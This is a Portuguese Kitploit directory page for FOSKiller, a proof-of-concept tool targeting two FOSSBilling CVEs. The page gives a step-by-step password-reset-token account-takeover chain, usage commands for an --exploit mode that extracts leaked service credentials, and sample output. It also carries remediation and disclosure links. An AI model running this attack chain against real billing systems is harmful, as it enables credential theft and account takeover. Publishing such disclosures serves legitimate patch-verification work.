Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
FOSKiller — FOSSBilling CVE-2026-53647 & CVE-2026-53646 PoC — Divulgação não autenticada de chave de API e reutilização de token de redefinição de senha | Kitploit
Ferramentas/GitHubGitHub/7megaumka7/foskiller
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Segurança de APIsTestes de Penetração
GitHub7megaumka7/foskiller

FOSKiller

FOSSBilling CVE-2026-53647 & CVE-2026-53646 PoC — Divulgação não autenticada de chave de API e reutilização de token de redefinição de senha

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
root@kitploit:~
 ███████╗ ██████╗ ███████╗██╗  ██╗██╗██╗     ██╗     ███████╗██████╗
 ██╔════╝██╔═══██╗██╔════╝██║ ██╔╝██║██║     ██║     ██╔════╝██╔══██╗
 █████╗  ██║   ██║███████╗█████╔╝ ██║██║     ██║     █████╗  ██████╔╝
 ██╔══╝  ██║   ██║╚════██║██╔═██╗ ██║██║     ██║     ██╔══╝  ██╔══██╗
 ██║     ╚██████╔╝███████║██║  ██╗██║███████╗███████╗███████╗██║  ██║
 ╚═╝      ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝

feito por 7megaumka7

Ferramenta PoC para duas vulnerabilidades aceitas no GitHub Security Advisory no FOSSBilling ≤ 0.7.2

Python License CVE-2026-53647 CVE-2026-53646


Índice

  • Introdução
  • Vulnerabilidades
    • CVE-2026-53647 — Divulgação de Configuração de Chave de API não Autenticada
    • CVE-2026-53646 — Reutilização de Token de Redefinição de Senha
  • Requisitos
  • Instalação
  • Uso
    • Flags
    • Modos
    • Exemplos
  • Exemplo de Saída
  • Remediação
  • Divulgação Responsável
  • Aviso Legal
  • Créditos

Introdução

FOSKiller é uma ferramenta de prova de conceito que demonstra duas vulnerabilidades de segurança no FOSSBilling — uma plataforma de código aberto para faturamento e gerenciamento de clientes. Ambas as vulnerabilidades foram divulgadas de forma responsável através do programa GitHub Security Advisory e estão totalmente corrigidas no FOSSBilling 0.7.3+.

A ferramenta é destinada a:

  • Pesquisadores de segurança verificando suas próprias instalações do FOSSBilling
  • Testadores de penetração conduzindo testes autorizados
  • Defensores confirmando a aplicação de patches

Vulnerabilidades

CVE-2026-53647 — Divulgação de Configuração de Chave de API não Autenticada

O endpoint convidado /api/guest/serviceapikey/get_info retorna a configuração completa do serviço — incluindo campos custom_*, credenciais de API, nomes de host e senhas — sem exigir qualquer autenticação. Um atacante que conheça ou enumere uma chave de API válida pode recuperar toda a configuração do serviço backend a partir de um endpoint público.

Impacto: Exposição de credenciais de serviço, nomes de host internos, segredos de API.

CVE-2026-53646 — Reutilização de Token de Redefinição de Senha

Quando um cliente aciona duas redefinições de senha consecutivas para a mesma conta, o aplicativo emite um novo token, mas não invalida o anterior. Um atacante que tenha capturado previamente o primeiro token pode usá-lo para definir uma nova senha mesmo após o usuário legítimo concluir seu próprio fluxo de redefinição.

Cadeia de ataque:

root@kitploit:~
1. Atacante aciona POST /api/guest/client/reset_password → captura token T1
2. Vítima aciona sua própria redefinição → app emite T2, T1 permanece válido
3. Atacante chama POST /api/guest/client/update_password?hash=T1 com senha escolhida
4. Atacante tem acesso persistente independentemente da conclusão da redefinição da vítima

Impacto: Assunção persistente de conta de qualquer cliente cujo e-mail de redefinição seja interceptável.


Requisitos

  • Python 3.8+
  • requests
  • colorama

Se as dependências estiverem faltando, o script detecta isso na inicialização e oferece a instalação automática.


Instalação

Clone e instale as dependências:

root@kitploit:~
git clone https://github.com/7megaumka7/FOSKiller.git
cd FOSKiller
pip install -r requirements.txt

Ou execute sem pré-instalação — o script perguntará se deseja instalar pacotes faltantes na primeira execução.


Uso

root@kitploit:~
python fossbilling_poc.py --target URL [--key KEY] [--email EMAIL]
                          [--check-only | --exploit]
                          [--force] [--output FILE]
                          [--timeout SEC] [--proxy URL]

Flags

--check-only e --exploit são mutuamente exclusivos.

Modos

Exemplos

Apenas detecção — verificar ambos os CVEs sem extrair dados:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --check-only

Extração completa e documentação da cadeia de ataque:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --exploit

Salvar resultados em JSON e rotear pelo Burp Suite:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --email [email protected] \
  --output results.json \
  --proxy http://127.0.0.1:8080

Testar uma versão desconhecida ou já corrigida:

root@kitploit:~
python fossbilling_poc.py \
  --target https://billing.example.com \
  --key myservicekey \
  --force

Exemplo de Saída

root@kitploit:~
[*] Probing https://billing.example.com …
[+] Detected version: 0.7.1
[+] CVE-2026-53647 affected range (>=0.5.3 <=0.7.2): YES
[+] CVE-2026-53646 affected range (>=0.5.6 <=0.7.2): YES

── CVE-2026-53647 │ Unauthenticated API Key Config Disclosure ─────────
[*] Target  : https://billing.example.com/api/guest/serviceapikey/get_info?key=***
[*] Mode    : Full extraction
[*] HTTP    : 200
[+] VULNERABLE — endpoint returned 4 sensitive field(s) without authentication

  Field                          Value
  ──────────────────────────────────────────────────────────────────────
  custom_hostname                db.internal.example.com
  custom_username                fossbilling_db
  custom_password                [REDACTED IN THIS EXAMPLE]
  custom_api_secret              [REDACTED IN THIS EXAMPLE]

── CVE-2026-53646 │ Password Reset Token Reuse / Account Takeover ─────
[*] Sending reset request #1 …
[*]   HTTP 200  |  142 ms  |  2026-06-12T10:00:00.000Z
[*] Sending reset request #2 (same email) …
[*]   HTTP 200  |  138 ms  |  2026-06-12T10:00:01.000Z
[*]   Time delta between requests : 0.643s
[!] Both reset requests succeeded — endpoint accepts repeated resets without rate-limiting.

── Summary ─────────────────────────────────────────────────────────────

  CVE                  GHSA                         Severity               Status
  ──────────────────────────────────────────────────────────────────────────────────
  CVE-2026-53647       GHSA-737q-9gpr-6mpq          Moderate (CVSS 6.9)    VULNERABLE
  CVE-2026-53646       GHSA-vp66-w6rc-x32p          High (CVSS 7.7)        POTENTIALLY_VULNERABLE

Remediação

Atualize para FOSSBilling >= 0.7.3, que corrige ambas as vulnerabilidades.

Se a correção imediata não for possível:

CVEMitigação Temporária
CVE-2026-53647Bloqueie o acesso a /api/guest/serviceapikey/ no servidor web ou nível WAF
CVE-2026-53646Implemente invalidação de token na reemissão; adicione limitação de taxa ao endpoint de redefinição

Divulgação Responsável

Ambas as vulnerabilidades foram reportadas aos mantenedores do FOSSBilling através do programa GitHub Security Advisory antes desta publicação.

  • Advisory 1: https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-737q-9gpr-6mpq
  • Advisory 2: https://github.com/FOSSBilling/FOSSBilling/security/advisories/GHSA-vp66-w6rc-x32p

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados.

Use esta ferramenta apenas contra sistemas que você possui ou para os quais recebeu autorização explícita por escrito para testar. O uso não autorizado contra sistemas de terceiros é ilegal sob o Computer Fraud and Abuse Act (CFAA), o Computer Misuse Act e legislação equivalente em todo o mundo.

O autor não assume nenhuma responsabilidade por uso indevido, danos ou consequências legais decorrentes do uso desta ferramenta. Ao usar esta ferramenta, você concorda que é o único responsável por suas ações.


Créditos

Pesquisador e Autor: 7megaumka7

Descoberta de vulnerabilidade, análise, divulgação responsável e desenvolvimento da ferramenta.

Baixar ferramenta
AdvisoryCVETipoCVSSAfetado
GHSA-737q-9gpr-6mpqCVE-2026-53647Divulgação de Configuração de Chave de API não Autenticada6.9 Moderado>= 0.5.3, <= 0.7.2
GHSA-vp66-w6rc-x32pCVE-2026-53646Reutilização de Token de Redefinição de Senha → Assunção de Conta7.7 Alto>= 0.5.6, <= 0.7.2
FlagObrigatórioDescrição
--target URLSimURL base da instância do FOSSBilling
--key KEYPara CVE-2026-53647Chave de API a testar
--email EMAILPara CVE-2026-53646E-mail do cliente a testar
--check-onlyNãoModo de detecção — confirme a vulnerabilidade sem extrair dados
--exploitNãoExtração completa + documentação da cadeia de ataque
--forceNãoIgnorar verificação de faixa de versão
--output FILENãoSalvar resultados completos em um arquivo JSON
--timeout SECNãoTimeout HTTP em segundos (padrão: 10)
--proxy URLNãoProxy HTTP (ex.: http://127.0.0.1:8080)
ModoFlagO que faz
Detecção--check-onlyConfirma se a vulnerabilidade existe. Não exibe ou extrai valores sensíveis.
Padrão(sem flag de modo)Confirma o status e mostra evidências básicas.
Exploração--exploitExtrai todos os campos vazados; documenta a cadeia completa de assunção de conta com metadados de tempo.